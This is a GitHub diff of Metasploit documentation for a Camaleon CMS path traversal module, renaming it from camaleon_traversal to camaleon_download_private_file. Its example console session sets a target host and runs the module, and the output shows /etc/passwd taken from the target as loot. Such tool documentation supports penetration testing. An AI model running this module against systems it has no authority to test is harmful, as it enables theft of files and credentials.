File tree Expand file tree Collapse file tree
documentation/modules/auxiliary/gather Expand file tree Collapse file tree Original file line number Diff line number Diff line change @@ -133,7 +133,7 @@ Then navigate to "Users -> + Add User" and fill out the form.
133133
134134## Verification Steps
135135
136- 1 . Do: ` use auxiliary/gather/camaleon_traversal `
136+ 1 . Do: ` use auxiliary/gather/camaleon_download_private_file `
1371372 . Do: ` set RHOST [IP] `
1381383 . Do: ` run `
139139
@@ -150,14 +150,14 @@ The number of "../" appended to the filename. Default is 13
150150## Scenarios
151151
152152```
153- msf > use auxiliary/gather/camaleon_traversal
154- msf auxiliary(gather/camaleon_traversal ) > set rhost 10.0.0.45
153+ msf > use auxiliary/gather/camaleon_download_private_file
154+ msf auxiliary(gather/camaleon_download_private_file ) > set rhost 10.0.0.45
155155rhost => 10.0.0.45
156- msf auxiliary(gather/camaleon_traversal ) > set rport 3000
156+ msf auxiliary(gather/camaleon_download_private_file ) > set rport 3000
157157rport => 3000
158- msf auxiliary(gather/camaleon_traversal ) > set ssl false
158+ msf auxiliary(gather/camaleon_download_private_file ) > set ssl false
159159ssl => false
160- msf auxiliary(gather/camaleon_traversal ) > run
160+ msf auxiliary(gather/camaleon_download_private_file ) > run
161161[*] Running module against 10.0.0.45
162162[+] /etc/passwd stored as '/home/kali/.msf4/loot/20260411192711_default_10.0.0.45_camaleon.travers_926890.txt'
163163
You can’t perform that action at this time.
0 commit comments